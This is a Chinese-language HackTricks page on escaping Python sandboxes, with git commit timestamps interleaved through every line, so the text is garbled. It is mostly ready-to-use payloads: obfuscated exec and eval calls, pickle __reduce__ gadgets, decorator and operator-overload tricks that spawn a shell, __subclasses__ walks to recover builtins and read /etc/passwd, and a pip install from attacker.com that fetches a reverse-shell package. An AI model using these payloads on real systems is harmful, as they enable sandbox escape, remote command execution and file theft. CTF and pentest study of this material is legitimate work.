2024-02-06 04:10:34 +00:00
# 绕过 Python 沙盒
2022-04-28 16:01:33 +00:00
< details >
2024-03-09 13:16:16 +00:00
< summary > < strong > 从零开始学习 AWS 黑客技术,成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS 红队专家)< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-06 04:10:34 +00:00
支持 HackTricks 的其他方式:
2023-12-30 22:37:12 +00:00
2024-02-06 04:10:34 +00:00
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
2024-03-09 13:16:16 +00:00
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或**关注**我们的**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**。**
2024-02-06 04:10:34 +00:00
* 通过向 [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 仓库提交 PR 来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-03-09 13:16:16 +00:00
这些是绕过 Python 沙盒保护并执行任意命令的一些技巧。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
## 命令执行库
2020-07-15 15:43:14 +00:00
2024-02-06 04:10:34 +00:00
您需要了解的第一件事是,您是否可以直接使用某个已导入的库执行代码,或者您是否可以导入以下任何库:
2020-07-15 15:43:14 +00:00
```python
os.system("ls")
os.popen("ls").read()
2023-08-03 19:12:22 +00:00
commands.getstatusoutput("ls")
2020-07-15 15:43:14 +00:00
commands.getoutput("ls")
commands.getstatus("file/path")
subprocess.call("ls", shell=True)
subprocess.Popen("ls", shell=True)
pty.spawn("ls")
pty.spawn("/bin/bash")
2021-02-03 23:03:54 +00:00
platform.os.system("ls")
2021-10-06 00:19:16 +00:00
pdb.os.system("ls")
2020-07-15 15:43:14 +00:00
2021-06-24 23:53:47 +00:00
#Import functions to execute commands
importlib.import_module("os").system("ls")
importlib.__import__("os").system("ls")
imp.load_source("os","/usr/lib/python3.8/os.py").system("ls")
imp.os.system("ls")
imp.sys.modules["os"].system("ls")
sys.modules["os"].system("ls")
__import__("os").system("ls")
import os
from os import *
2020-07-15 15:43:14 +00:00
#Other interesting functions
open("/etc/passwd").read()
open('/var/www/html/input', 'w').write('123')
2021-06-24 23:53:47 +00:00
#In Python2.7
execfile('/usr/lib/python2.7/os.py')
system('ls')
2020-07-15 15:43:14 +00:00
```
2024-03-09 13:16:16 +00:00
请记住,`open` 和 `read` 函数可以用于在 Python 沙盒内读取文件,并编写一些代码来执行以绕过沙盒。
2020-07-15 15:43:14 +00:00
2021-06-24 23:53:47 +00:00
{% hint style="danger" %}
2024-02-06 04:10:34 +00:00
**Python2 input()** 函数允许在程序崩溃之前执行 Python 代码。
2021-06-24 23:53:47 +00:00
{% endhint %}
2020-07-15 15:43:14 +00:00
2024-02-06 04:10:34 +00:00
Python 会尝试**首先从当前目录加载库**(以下命令将打印 Python 加载模块的位置):`python3 -c 'import sys; print(sys.path)'`
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . . / . . / . gitbook / assets / image ( 552 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-06 04:10:34 +00:00
## 使用默认安装的 Python 包绕过 pickle 沙盒
2021-02-05 00:28:18 +00:00
2023-09-03 01:34:43 +00:00
### 默认包
2021-02-05 00:28:18 +00:00
2024-03-09 13:16:16 +00:00
您可以在此处找到**预安装的包列表**: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\
2024-02-06 04:10:34 +00:00
请注意,通过 pickle, 您可以使 Python 环境**导入系统中安装的任意库**。\
2024-03-09 13:16:16 +00:00
例如,加载以下 pickle 时,将导入 pip 库以使用它:
2021-02-05 00:28:18 +00:00
```python
#Note that here we are importing the pip library so the pickle is created correctly
2022-09-12 21:12:49 +00:00
#however, the victim doesn't even need to have the library installed to execute it
2021-02-05 00:28:18 +00:00
#the library is going to be loaded automatically
import pickle, os, base64, pip
class P(object):
2023-08-03 19:12:22 +00:00
def __reduce__ (self):
return (pip.main,(["list"],))
2021-02-05 00:28:18 +00:00
print(base64.b64encode(pickle.dumps(P(), protocol=0)))
```
2024-02-06 04:10:34 +00:00
### Pip软件包
2021-02-05 00:36:31 +00:00
2024-03-09 13:16:16 +00:00
由**@isHaacK**分享的技巧
2021-02-05 00:28:18 +00:00
2024-03-09 13:16:16 +00:00
如果您可以访问`pip`或`pip.main()`, 您可以安装任意软件包并调用以下命令获取反向shell:
2021-02-05 00:28:18 +00:00
```bash
pip install http://attacker.com/Rerverse.tar.gz
pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
```
2024-03-09 13:16:16 +00:00
你可以在这里下载用于创建反向shell的软件包。请注意, 在使用之前, 您应该**解压缩它,更改`setup.py`, 并将您的IP放入反向shell中**:
2021-02-05 00:28:18 +00:00
2023-06-06 22:57:49 +00:00
{% file src="../../../.gitbook/assets/reverse.tar.gz" %}
2021-02-05 00:28:18 +00:00
2021-02-05 08:59:17 +00:00
{% hint style="info" %}
2024-03-09 13:16:16 +00:00
这个软件包名为`Reverse`。但是, 它经过特殊设计, 当您退出反向shell时, 安装的其余部分将失败, 因此当您离开时**不会在服务器上留下任何额外的Python软件包**。
2021-02-05 08:59:17 +00:00
{% endhint %}
2024-02-06 04:10:34 +00:00
## 评估Python代码
2020-07-15 15:43:14 +00:00
2022-07-05 11:06:01 +00:00
{% hint style="warning" %}
2024-03-09 13:16:16 +00:00
请注意, exec允许多行字符串和“;”, 但eval不允许( 检查海象操作符)
2022-07-05 11:06:01 +00:00
{% endhint %}
2024-03-09 13:16:16 +00:00
如果某些字符被禁止使用,您可以使用**十六进制/八进制/Base64**表示来**绕过**限制:
2020-07-15 15:43:14 +00:00
```python
exec("print('RCE'); __import__ ('os').system('ls')") #Using ";"
exec("print('RCE')\n__import__('os').system('ls')") #Using "\n"
eval("__import__('os').system('ls')") #Eval doesn't allow ";"
eval(compile('print("hello world"); print("heyy")', '< stdin > ', 'exec')) #This way eval accept ";"
__import__('timeit').timeit("__import__('os').system('ls')",number=1)
#One liners that allow new lines and tabs
eval(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '< stdin > ', 'exec'))
exec(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '< stdin > ', 'exec'))
```
```python
#Octal
exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51")
#Hex
2023-04-14 11:17:09 +00:00
exec("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x27\x6c\x73\x27\x29")
2020-07-15 15:43:14 +00:00
#Base64
exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
```
2024-02-06 04:10:34 +00:00
### 允许评估Python代码的其他库
2023-01-22 23:51:23 +00:00
```python
#Pandas
import pandas as pd
df = pd.read_csv("currency-rates.csv")
df.query('@__builtins__.__import__("os").system("ls")')
df.query("@pd.io.common.os.popen('ls').read()")
df.query("@pd.read_pickle('http://0.0.0.0:6334/output.exploit')")
# The previous options work but others you might try give the error:
# Only named functions are supported
# Like:
df.query("@pd.annotations.__class__.__init__.__globals__['__builtins__']['eval']('print(1)')")
```
2023-08-03 19:12:22 +00:00
## 运算符和简便技巧
2022-07-05 11:06:01 +00:00
```python
2022-09-12 21:12:49 +00:00
# walrus operator allows generating variable inside a list
2022-07-05 11:06:01 +00:00
## everything will be executed in order
## From https://ur4ndom.dev/posts/2020-06-29-0ctf-quals-pyaucalc/
[a:=21,a*2]
[y:=().__class__.__base__.__subclasses__()[84]().load_module('builtins'),y.__import__('signal').alarm(0), y.exec("import\x20os,sys\nclass\x20X:\n\tdef\x20__del__(self):os.system('/bin/sh')\n\nsys.modules['pwnd']=X()\nsys.exit()", {"__builtins__":y.__dict__})]
## This is very useful for code injected inside "eval" as it doesn't support multiple lines or ";"
```
2024-02-06 04:10:34 +00:00
## 通过编码( UTF-7) 绕过保护
2022-07-05 11:06:01 +00:00
2024-02-06 04:10:34 +00:00
在[**这篇文章**](https://blog.arkark.dev/2022/11/18/seccon-en/#misc-latexipy)中, 使用UTF-7来加载和执行任意Python代码, 绕过了一个明显的沙盒:
2023-01-13 17:40:30 +00:00
```python
assert b"+AAo-".decode("utf_7") == "\n"
payload = """
# -*- coding: utf_7 -*-
def f(x):
2023-08-03 19:12:22 +00:00
return x
#+AAo-print(open("/flag.txt").read())
2023-01-13 17:40:30 +00:00
""".lstrip()
```
2024-02-06 04:10:34 +00:00
也可以使用其他编码方式来绕过,例如 `raw_unicode_escape` 和 `unicode_escape` 。
2023-01-13 17:40:30 +00:00
2024-02-06 04:10:34 +00:00
## 无需调用的Python执行
2022-07-03 20:38:21 +00:00
2024-02-06 04:10:34 +00:00
如果你处于一个**不允许你进行调用**的Python监狱中, 仍然有一些方法可以**执行任意函数、代码**和**命令**。
2022-07-03 20:38:21 +00:00
2023-12-30 22:37:12 +00:00
### 使用[装饰器](https://docs.python.org/3/glossary.html#term-decorator)进行RCE
2022-07-03 20:38:21 +00:00
```python
2022-07-05 10:47:46 +00:00
# From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/
@exec
@input
class X:
2023-08-03 19:12:22 +00:00
pass
2022-07-05 10:47:46 +00:00
# The previous code is equivalent to:
class X:
2023-08-03 19:12:22 +00:00
pass
2022-07-05 10:47:46 +00:00
X = input(X)
X = exec(X)
2022-09-12 21:12:49 +00:00
# So just send your python code when prompted and it will be executed
2022-07-05 10:47:46 +00:00
# Another approach without calling input:
2022-07-03 20:38:21 +00:00
@eval
@'__import__("os").system("sh")'.format
class _:pass
```
2024-02-06 04:10:34 +00:00
### 利用创建对象和重载实现RCE
2022-07-03 20:38:21 +00:00
2024-02-06 04:10:34 +00:00
如果你可以**声明一个类**并**创建该类的一个对象**,你可以**编写/重写不同的方法**,这些方法可以在**不需要直接调用它们**的情况下被**触发**。
2022-07-05 10:47:46 +00:00
2024-02-06 04:10:34 +00:00
#### 使用自定义类实现RCE
2022-07-02 18:05:33 +00:00
2024-02-06 04:10:34 +00:00
你可以修改一些**类方法**(通过重写现有的类方法或创建一个新的类)来使它们在**被触发**时执行任意代码,而无需直接调用它们。
2022-07-02 18:05:33 +00:00
```python
2022-09-12 21:12:49 +00:00
# This class has 3 different ways to trigger RCE without directly calling any function
2022-07-05 10:47:46 +00:00
class RCE:
2023-08-03 19:12:22 +00:00
def __init__ (self):
self += "print('Hello from __init__ + __iadd__ ')"
__iadd__ = exec #Triggered when object is created
def __del__ (self):
self -= "print('Hello from __del__ + __isub__ ')"
__isub__ = exec #Triggered when object is created
__getitem__ = exec #Trigerred with obj[< argument > ]
__add__ = exec #Triggered with obj + < argument >
2022-07-05 10:47:46 +00:00
2022-07-05 11:06:01 +00:00
# These lines abuse directly the previous class to get RCE
2022-07-05 10:49:47 +00:00
rce = RCE() #Later we will see how to create objects without calling the constructor
2022-07-05 10:47:46 +00:00
rce["print('Hello from __getitem__ ')"]
rce + "print('Hello from __add__ ')"
2022-07-05 10:49:47 +00:00
del rce
2022-07-05 10:47:46 +00:00
2022-07-05 11:06:01 +00:00
# These lines will get RCE when the program is over (exit)
sys.modules["pwnd"] = RCE()
exit()
# Other functions to overwrite
2022-07-05 10:47:46 +00:00
__sub__ (k - 'import os; os.system("sh")')
__mul__ (k * 'import os; os.system("sh")')
__floordiv__ (k // 'import os; os.system("sh")')
__truediv__ (k / 'import os; os.system("sh")')
__mod__ (k % 'import os; os.system("sh")')
__pow__ (k**'import os; os.system("sh")')
__lt__ (k < 'import os; os.system("sh")')
__le__ (k < = 'import os; os.system("sh")')
__eq__ (k == 'import os; os.system("sh")')
__ne__ (k != 'import os; os.system("sh")')
__ge__ (k >= 'import os; os.system("sh")')
__gt__ (k > 'import os; os.system("sh")')
__iadd__ (k += 'import os; os.system("sh")')
__isub__ (k -= 'import os; os.system("sh")')
__imul__ (k *= 'import os; os.system("sh")')
__ifloordiv__ (k //= 'import os; os.system("sh")')
__idiv__ (k /= 'import os; os.system("sh")')
__itruediv__ (k /= 'import os; os.system("sh")') (Note that this only works when from __future__ import division is in effect.)
__imod__ (k %= 'import os; os.system("sh")')
__ipow__ (k ** = 'import os; os.system("sh")')
__ilshift__ (k< < = 'import os; os.system("sh")')
__irshift__ (k >>= 'import os; os.system("sh")')
__iand__ (k = 'import os; os.system("sh")')
__ior__ (k |= 'import os; os.system("sh")')
__ixor__ (k ^= 'import os; os.system("sh")')
```
2023-12-30 22:37:12 +00:00
#### 使用[元类](https://docs.python.org/3/reference/datamodel.html#metaclasses)创建对象
2023-08-03 19:12:22 +00:00
2024-03-09 13:16:16 +00:00
元类允许我们做的关键事情是,通过使用目标类作为元类,创建一个新的类,从而**在不直接调用构造函数的情况下实例化一个类的实例**。
2023-08-03 19:12:22 +00:00
```python
# Code from https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/ and fixed
# This will define the members of the "subclass"
class Metaclass(type):
__getitem__ = exec # So Sub[string] will execute exec(string)
# Note: Metaclass.__class__ == type
class Sub(metaclass=Metaclass): # That's how we make Sub.__class__ == Metaclass
pass # Nothing special to do
Sub['import os; os.system("sh")']
## You can also use the tricks from the previous section to get RCE with this object
```
2024-02-06 04:10:34 +00:00
#### 通过异常创建对象
2023-08-03 19:12:22 +00:00
2024-02-06 04:10:34 +00:00
当**触发异常**时,会**创建**一个**Exception**对象,而无需直接调用构造函数(来自[**@\_nag0mez**](https://mobile.twitter.com/\_nag0mez)的技巧):
2023-08-03 19:12:22 +00:00
```python
class RCE(Exception):
def __init__ (self):
self += 'import os; os.system("sh")'
__iadd__ = exec #Triggered when object is created
raise RCE #Generate RCE object
# RCE with __add__ overloading and try/except + raise generated object
class Klecko(Exception):
__add__ = exec
try:
raise Klecko
except Klecko as k:
k + 'import os; os.system("sh")' #RCE abusing __add__
## You can also use the tricks from the previous section to get RCE with this object
```
2024-02-06 04:10:34 +00:00
### 更多远程代码执行
2023-08-03 19:12:22 +00:00
```python
2023-09-03 01:34:43 +00:00
# From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/
# If sys is imported, you can sys.excepthook and trigger it by triggering an error
class X:
def __init__ (self, a, b, c):
self += "os.system('sh')"
__iadd__ = exec
sys.excepthook = X
1/0 #Trigger it
2023-08-03 19:12:22 +00:00
2023-09-03 01:34:43 +00:00
# From https://github.com/google/google-ctf/blob/master/2022/sandbox-treebox/healthcheck/solution.py
# The interpreter will try to import an apt-specific module to potentially
# report an error in ubuntu-provided modules.
# Therefore the __import__ functions are overwritten with our RCE
class X():
def __init__ (self, a, b, c, d, e):
self += "print(open('flag').read())"
__iadd__ = eval
__builtins__.__import__ = X
{}[1337]
2023-08-03 19:12:22 +00:00
```
2024-02-06 04:10:34 +00:00
### 使用内置的帮助和许可证读取文件
2023-08-03 19:12:22 +00:00
```python
2023-09-03 01:34:43 +00:00
__builtins__.__dict__["license"]._Printer__filenames=["flag"]
a = __builtins__ .help
a.__class__.__enter__ = __builtins__ .__dict__["license"]
a.__class__.__exit__ = lambda self, *args: None
with (a as b):
pass
2023-08-03 19:12:22 +00:00
```
2024-02-06 04:10:34 +00:00
## 内建函数
2023-08-03 19:12:22 +00:00
2024-02-06 04:10:34 +00:00
* [**Python2的内建函数** ](https://docs.python.org/2/library/functions.html )
* [**Python3的内建函数** ](https://docs.python.org/3/library/functions.html )
2023-08-03 19:12:22 +00:00
2024-03-09 13:16:16 +00:00
如果你可以访问**`__builtins__`**对象,你可以导入库(注意,你也可以在最后一节中使用其他字符串表示形式):
2023-09-03 01:34:43 +00:00
```python
__builtins__.__import__("os").system("ls")
__builtins__.__dict__['__import__']("os").system("ls")
2023-08-03 19:12:22 +00:00
```
2024-02-06 04:10:34 +00:00
### 无内建函数
2023-08-03 19:12:22 +00:00
2024-02-06 04:10:34 +00:00
当你没有 `__builtins__` 时,你将无法导入任何东西,甚至无法读取或写入文件,因为**所有的全局函数**(如 `open` 、`import`、`print`...) **都没有被加载**。\
然而,**默认情况下, Python会在内存中导入许多模块**。这些模块可能看起来无害,但其中一些**也导入了危险的**功能,可以访问这些功能以获得甚至**任意代码执行**。
2023-09-03 01:34:43 +00:00
2024-03-09 13:16:16 +00:00
在以下示例中,您可以看到如何**滥用**一些这些“**无害**”模块加载的方式来**访问**其中的**危险** **功能** 。
2023-08-03 19:12:22 +00:00
2023-09-03 01:34:43 +00:00
**Python2**
2023-08-03 19:12:22 +00:00
```python
2023-09-03 01:34:43 +00:00
#Try to reload __builtins__
reload(__builtins__)
import __builtin__
# Read recovering <type 'file'> in offset 40
().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()
# Write recovering <type 'file'> in offset 40
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')
2023-08-03 19:12:22 +00:00
2023-09-03 01:34:43 +00:00
# Execute recovering __import__ (class 59s is <class 'warnings.catch_warnings'>)
().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']('os').system('ls')
# Execute (another method)
().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__("func_globals")['linecache'].__dict__['os'].__dict__['system']('ls')
# Execute recovering eval symbol (class 59 is <class 'warnings.catch_warnings'>)
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]["eval"]("__import__('os').system('ls')")
# Or you could obtain the builtins from a defined function
get_flag.__globals__['__builtins__']['__import__']("os").system("ls")
2023-08-03 19:12:22 +00:00
```
2024-02-06 04:10:34 +00:00
#### Python3
2023-09-03 01:34:43 +00:00
#### Python3
2023-08-03 19:12:22 +00:00
```python
2023-09-03 01:34:43 +00:00
# Obtain builtins from a globally defined function
# https://docs.python.org/3/library/functions.html
2023-11-05 22:36:17 +00:00
help.__call__.__builtins__ # or __globals__
license.__call__.__builtins__ # or __globals__
credits.__call__.__builtins__ # or __globals__
2023-09-03 01:34:43 +00:00
print.__self__
dir.__self__
globals.__self__
len.__self__
2023-11-05 22:36:17 +00:00
__build_class__.__self__
2023-08-03 19:12:22 +00:00
2023-09-03 01:34:43 +00:00
# Obtain the builtins from a defined function
get_flag.__globals__['__builtins__']
2023-08-03 19:12:22 +00:00
2023-09-03 01:34:43 +00:00
# Get builtins from loaded classes
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"]
```
2024-02-06 04:10:34 +00:00
[**下面有一个更大的函数** ](./#recursive-search-of-builtins-globals )用于查找数十/**数百**个您可以找到**内置函数**的**位置**。
2023-08-03 19:12:22 +00:00
2023-12-30 22:37:12 +00:00
#### Python2 和 Python3
2023-08-03 19:12:22 +00:00
```python
2023-09-03 01:34:43 +00:00
# Recover __builtins__ and make everything easier
__builtins__= [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__
__builtins__["__import__"]('os').system('ls')
2023-08-03 19:12:22 +00:00
```
2024-02-06 04:10:34 +00:00
### 内置载荷
2021-10-04 11:09:20 +00:00
```python
# Possible payloads once you have found the builtins
2022-11-05 10:56:30 +00:00
__builtins__["open"]("/etc/passwd").read()
__builtins__["__import__"]("os").system("ls")
2022-09-12 21:12:49 +00:00
# There are lots of other payloads that can be abused to execute commands
2021-10-06 00:19:16 +00:00
# See them below
2021-10-04 11:09:20 +00:00
```
2023-08-03 19:12:22 +00:00
## 全局变量和局部变量
2021-10-04 11:09:20 +00:00
2024-02-06 04:10:34 +00:00
检查 ** `globals` ** 和 ** `locals` ** 是了解你可以访问的内容的好方法。
2021-06-25 13:52:40 +00:00
```python
>>> globals()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': < class ' _frozen_importlib . BuiltinImporter ' > , '__spec__': None, '__annotations__': {}, '__builtins__': < module ' builtins ' ( built-in ) > , 'attr': < module ' attr ' from ' / usr / local / lib / python3 . 9 / site-packages / attr . py ' > , 'a': < class ' importlib . abc . Finder ' > , 'b': < class ' importlib . abc . MetaPathFinder ' > , 'c': < class ' str ' > , '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', < class ' DeprecationWarning ' > , 1): True}, 'z': < class ' str ' > }
>>> locals()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': < class ' _frozen_importlib . BuiltinImporter ' > , '__spec__': None, '__annotations__': {}, '__builtins__': < module ' builtins ' ( built-in ) > , 'attr': < module ' attr ' from ' / usr / local / lib / python3 . 9 / site-packages / attr . py ' > , 'a': < class ' importlib . abc . Finder ' > , 'b': < class ' importlib . abc . MetaPathFinder ' > , 'c': < class ' str ' > , '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', < class ' DeprecationWarning ' > , 1): True}, 'z': < class ' str ' > }
2021-10-06 00:19:16 +00:00
# Obtain globals from a defined function
get_flag.__globals__
2021-10-06 09:50:35 +00:00
# Obtain globals from an object of a class
class_obj.__init__.__globals__
2021-10-06 00:19:16 +00:00
# Obtaining globals directly from loaded classes
[ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x) ]
[< class ' function ' > ]
# Obtaining globals from __init__ of loaded classes
[ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x.__init__) ]
[< class ' _frozen_importlib . _ModuleLock ' > , < class ' _frozen_importlib . _DummyModuleLock ' > , < class ' _frozen_importlib . _ModuleLockManager ' > , < class ' _frozen_importlib . ModuleSpec ' > , < class ' _frozen_importlib_external . FileLoader ' > , < class ' _frozen_importlib_external . _NamespacePath ' > , < class ' _frozen_importlib_external . _NamespaceLoader ' > , < class ' _frozen_importlib_external . FileFinder ' > , < class ' zipimport . zipimporter ' > , < class ' zipimport . _ZipImportResourceReader ' > , < class ' codecs . IncrementalEncoder ' > , < class ' codecs . IncrementalDecoder ' > , < class ' codecs . StreamReaderWriter ' > , < class ' codecs . StreamRecoder ' > , < class ' os . _wrap_close ' > , < class ' _sitebuiltins . Quitter ' > , < class ' _sitebuiltins . _Printer ' > , < class ' types . DynamicClassAttribute ' > , < class ' types . _GeneratorWrapper ' > , < class ' warnings . WarningMessage ' > , < class ' warnings . catch_warnings ' > , < class ' reprlib . Repr ' > , < class ' functools . partialmethod ' > , < class ' functools . singledispatchmethod ' > , < class ' functools . cached_property ' > , < class ' contextlib . _GeneratorContextManagerBase ' > , < class ' contextlib . _BaseExitStack ' > , < class ' sre_parse . State ' > , < class ' sre_parse . SubPattern ' > , < class ' sre_parse . Tokenizer ' > , < class ' re . Scanner ' > , < class ' rlcompleter . Completer ' > , < class ' dis . Bytecode ' > , < class ' string . Template ' > , < class ' cmd . Cmd ' > , < class ' tokenize . Untokenizer ' > , < class ' inspect . BlockFinder ' > , < class ' inspect . Parameter ' > , < class ' inspect . BoundArguments ' > , < class ' inspect . Signature ' > , < class ' bdb . Bdb ' > , < class ' bdb . Breakpoint ' > , < class ' traceback . FrameSummary ' > , < class ' traceback . TracebackException ' > , < class ' __future__ . _Feature ' > , < class ' codeop . Compile ' > , < class ' codeop . CommandCompiler ' > , < class ' code . InteractiveInterpreter ' > , < class ' pprint . _safe_key ' > , < class ' pprint . PrettyPrinter ' > , < class ' _weakrefset . _IterationGuard ' > , < class ' _weakrefset . WeakSet ' > , < class ' threading . _RLock ' > , < class ' threading . Condition ' > , < class ' threading . Semaphore ' > , < class ' threading . Event ' > , < class ' threading . Barrier ' > , < class ' threading . Thread ' > , < class ' subprocess . CompletedProcess ' > , < class ' subprocess . Popen ' > ]
2022-05-01 12:41:36 +00:00
# Without the use of the dir() function
2021-10-06 00:19:16 +00:00
[ x for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__)]
[< class ' _frozen_importlib . _ModuleLock ' > , < class ' _frozen_importlib . _DummyModuleLock ' > , < class ' _frozen_importlib . _ModuleLockManager ' > , < class ' _frozen_importlib . ModuleSpec ' > , < class ' _frozen_importlib_external . FileLoader ' > , < class ' _frozen_importlib_external . _NamespacePath ' > , < class ' _frozen_importlib_external . _NamespaceLoader ' > , < class ' _frozen_importlib_external . FileFinder ' > , < class ' zipimport . zipimporter ' > , < class ' zipimport . _ZipImportResourceReader ' > , < class ' codecs . IncrementalEncoder ' > , < class ' codecs . IncrementalDecoder ' > , < class ' codecs . StreamReaderWriter ' > , < class ' codecs . StreamRecoder ' > , < class ' os . _wrap_close ' > , < class ' _sitebuiltins . Quitter ' > , < class ' _sitebuiltins . _Printer ' > , < class ' types . DynamicClassAttribute ' > , < class ' types . _GeneratorWrapper ' > , < class ' warnings . WarningMessage ' > , < class ' warnings . catch_warnings ' > , < class ' reprlib . Repr ' > , < class ' functools . partialmethod ' > , < class ' functools . singledispatchmethod ' > , < class ' functools . cached_property ' > , < class ' contextlib . _GeneratorContextManagerBase ' > , < class ' contextlib . _BaseExitStack ' > , < class ' sre_parse . State ' > , < class ' sre_parse . SubPattern ' > , < class ' sre_parse . Tokenizer ' > , < class ' re . Scanner ' > , < class ' rlcompleter . Completer ' > , < class ' dis . Bytecode ' > , < class ' string . Template ' > , < class ' cmd . Cmd ' > , < class ' tokenize . Untokenizer ' > , < class ' inspect . BlockFinder ' > , < class ' inspect . Parameter ' > , < class ' inspect . BoundArguments ' > , < class ' inspect . Signature ' > , < class ' bdb . Bdb ' > , < class ' bdb . Breakpoint ' > , < class ' traceback . FrameSummary ' > , < class ' traceback . TracebackException ' > , < class ' __future__ . _Feature ' > , < class ' codeop . Compile ' > , < class ' codeop . CommandCompiler ' > , < class ' code . InteractiveInterpreter ' > , < class ' pprint . _safe_key ' > , < class ' pprint . PrettyPrinter ' > , < class ' _weakrefset . _IterationGuard ' > , < class ' _weakrefset . WeakSet ' > , < class ' threading . _RLock ' > , < class ' threading . Condition ' > , < class ' threading . Semaphore ' > , < class ' threading . Event ' > , < class ' threading . Barrier ' > , < class ' threading . Thread ' > , < class ' subprocess . CompletedProcess ' > , < class ' subprocess . Popen ' > ]
2021-06-25 13:52:40 +00:00
```
2024-02-06 04:10:34 +00:00
## 寻找全局变量的递归搜索
2024-03-09 13:16:16 +00:00
在这里有一个更大的函数,可以找到数十/**数百**个**位置**,您可以在其中找到**全局变量**。
2021-06-25 13:52:40 +00:00
2023-08-03 19:12:22 +00:00
## 发现任意执行
2021-06-25 13:39:46 +00:00
2024-03-09 13:16:16 +00:00
在这里,我想解释如何轻松发现**加载的更危险功能**并提出更可靠的利用方法。
2021-06-25 13:39:46 +00:00
2023-08-03 19:12:22 +00:00
#### 通过绕过访问子类
2021-06-25 13:39:46 +00:00
2024-03-09 13:16:16 +00:00
这种技术最敏感的部分之一是能够**访问基类的子类**。在之前的示例中,可以使用`''.__class__.__base__.__subclasses__()`来实现,但还有**其他可能的方法**:
2021-06-25 13:39:46 +00:00
```python
#You can access the base from mostly anywhere (in regular conditions)
2021-10-06 00:19:16 +00:00
"".__class__.__base__.__subclasses__()
2021-06-25 13:39:46 +00:00
[].__class__.__base__.__subclasses__()
{}.__class__.__base__.__subclasses__()
().__class__.__base__.__subclasses__()
2021-10-06 00:19:16 +00:00
(1).__class__.__base__.__subclasses__()
2021-06-25 13:39:46 +00:00
bool.__class__.__base__.__subclasses__()
2021-10-06 00:19:16 +00:00
print.__class__.__base__.__subclasses__()
open.__class__.__base__.__subclasses__()
defined_func.__class__.__base__.__subclasses__()
2021-06-25 13:39:46 +00:00
#You can also access it without "__base__" or "__class__"
2022-05-01 12:41:36 +00:00
# You can apply the previous technique also here
2021-06-25 13:39:46 +00:00
"".__class__.__bases__[0].__subclasses__()
"".__class__.__mro__[1].__subclasses__()
"".__getattribute__("__class__").mro()[1].__subclasses__()
"".__getattribute__("__class__").__base__.__subclasses__()
2023-12-30 22:37:12 +00:00
# This can be useful in case it is not possible to make calls (therefore using decorators)
().__class__.__class__.__subclasses__(().__class__.__class__)[0].register.__builtins__["breakpoint"]() # From https://github.com/salvatore-abello/python-ctf-cheatsheet/tree/main/pyjails#no-builtins-no-mro-single-exec
2022-09-12 21:12:49 +00:00
#If attr is present you can access everything as a string
# This is common in Django (and Jinja) environments
2021-06-25 13:39:46 +00:00
(''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(132)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen'))('cat+flag.txt').read()
(''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read()
```
2024-02-06 04:10:34 +00:00
### 寻找已加载的危险库
